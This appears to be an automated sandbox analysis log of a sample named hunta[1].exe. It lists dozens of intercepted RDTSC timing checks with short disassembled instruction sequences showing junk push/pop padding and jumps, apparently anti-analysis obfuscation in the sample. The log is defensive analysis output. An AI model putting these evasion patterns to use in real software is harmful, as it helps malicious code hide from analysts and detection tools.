Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2836 second address: 11B2843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2843 second address: 11B284D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E5514DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176C44 second address: 1176C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176C48 second address: 1176C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176C4C second address: 1176C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176C52 second address: 1176C57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176C57 second address: 1176CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF2E55A2C26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FF2E55A2C28h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a adc edi, 41F36D34h 0x00000030 lea eax, dword ptr [ebp+1247C9A6h] 0x00000036 mov ecx, dword ptr [ebp+122D2A4Dh] 0x0000003c nop 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176CA3 second address: 1176CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176CA7 second address: 1176CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176CAB second address: 115BA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E5514DEDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007FF2E5514DF9h 0x00000014 jmp 00007FF2E5514DEEh 0x00000019 popad 0x0000001a pop edi 0x0000001b nop 0x0000001c call dword ptr [ebp+122D2037h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF2E5514DF0h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1177397 second address: 11773A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF2E55A2C26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11773A4 second address: 11773A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11778A3 second address: 11778D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF2E55A2C39h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ecx, 53426DAFh 0x00000011 push 00000004h 0x00000013 movzx edx, ax 0x00000016 nop 0x00000017 push esi 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1177DF5 second address: 1177DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1178067 second address: 115C543 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f call dword ptr [ebp+1244E4F4h] 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FF2E55A2C26h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7D58 second address: 11B7D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7EF6 second address: 11B7EFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7EFB second address: 11B7F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF2E5514DE6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7F08 second address: 11B7F19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7F19 second address: 11B7F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7F1D second address: 11B7F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF2E55A2C26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7F2B second address: 11B7F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8076 second address: 11B8080 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8080 second address: 11B8086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8086 second address: 11B80C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FF2E55A2C26h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007FF2E55A2C28h 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007FF2E55A2C33h 0x0000001f push esi 0x00000020 pop esi 0x00000021 jmp 00007FF2E55A2C2Bh 0x00000026 jmp 00007FF2E55A2C2Fh 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B80C4 second address: 11B80CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B824B second address: 11B8257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007FF2E55A2C26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8257 second address: 11B825D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B83F2 second address: 11B83F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B83F6 second address: 11B842D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF2E5514E05h 0x0000000c jg 00007FF2E5514DE6h 0x00000012 jmp 00007FF2E5514DF9h 0x00000017 ja 00007FF2E5514DE8h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B842D second address: 11B8467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8467 second address: 11B846D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B85D9 second address: 11B85E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF2E55A2C26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B85E9 second address: 11B85F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B873A second address: 11B8751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF2E55A2C2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8751 second address: 11B8757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8757 second address: 11B8781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF2E55A2C26h 0x0000000a popad 0x0000000b jbe 00007FF2E55A2C43h 0x00000011 jmp 00007FF2E55A2C37h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8781 second address: 11B87AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FF2E5514DEBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E5514DF9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B88ED second address: 11B88F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11BE5F9 second address: 11BE64D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF2E5514DF2h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jnl 00007FF2E5514DE6h 0x0000001d jmp 00007FF2E5514DF4h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push edx 0x00000026 jmp 00007FF2E5514DECh 0x0000002b pushad 0x0000002c popad 0x0000002d pop edx 0x0000002e push edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C13A2 second address: 11C13BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF2E55A2C2Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF2E55A2C26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C13BE second address: 11C13C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C13C2 second address: 11C13D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FF2E55A2C26h 0x00000011 jno 00007FF2E55A2C26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C13D9 second address: 11C13E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C16E3 second address: 11C16E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C1877 second address: 11C187F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C52E5 second address: 11C5307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF2E55A2C33h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C999D second address: 11C99E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF2E5514E0Bh 0x0000000c jmp 00007FF2E5514DF7h 0x00000011 jmp 00007FF2E5514DEEh 0x00000016 jmp 00007FF2E5514DEFh 0x0000001b popad 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C99E5 second address: 11C99EF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C99EF second address: 11C99FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C8C08 second address: 11C8C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C902E second address: 11C904F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF2E5514DE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF2E5514DF5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C904F second address: 11C9070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF2E55A2C26h 0x00000009 jmp 00007FF2E55A2C36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C9070 second address: 11C907D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FF2E5514DECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C9209 second address: 11C9217 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C9217 second address: 11C921B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C921B second address: 11C9221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C935C second address: 11C9360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C951F second address: 11C9540 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E55A2C35h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CF3E4 second address: 11CF3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CF3E8 second address: 11CF40E instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E55A2C3Dh 0x00000008 jmp 00007FF2E55A2C37h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CF40E second address: 11CF419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF2E5514DE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CDD2F second address: 11CDD41 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E55A2C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CDD41 second address: 11CDD47 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CDEB1 second address: 11CDEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CDFE9 second address: 11CDFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CE2E3 second address: 11CE302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C39h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CE302 second address: 11CE306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CE44F second address: 11CE461 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FF2E55A2C26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1177ABB second address: 1177ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1177BB1 second address: 1177BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1177BB6 second address: 1177BD6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E5514DE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E5514DF0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CF0CF second address: 11CF0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CF0DB second address: 11CF0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11360A2 second address: 11360BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6420 second address: 11D6424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6424 second address: 11D6445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6445 second address: 11D6449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6449 second address: 11D644F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6719 second address: 11D671F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D671F second address: 11D672F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D672F second address: 11D6737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6737 second address: 11D673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D7046 second address: 11D7056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E5514DE6h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D7384 second address: 11D7390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF2E55A2C2Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E0BE9 second address: 11E0BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF2E5514DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E0059 second address: 11E009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FF2E55A2C28h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FF2E55A2C38h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FF2E55A2C33h 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E009B second address: 11E009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E01C3 second address: 11E01C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E01C9 second address: 11E01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E0336 second address: 11E033E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E079D second address: 11E07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
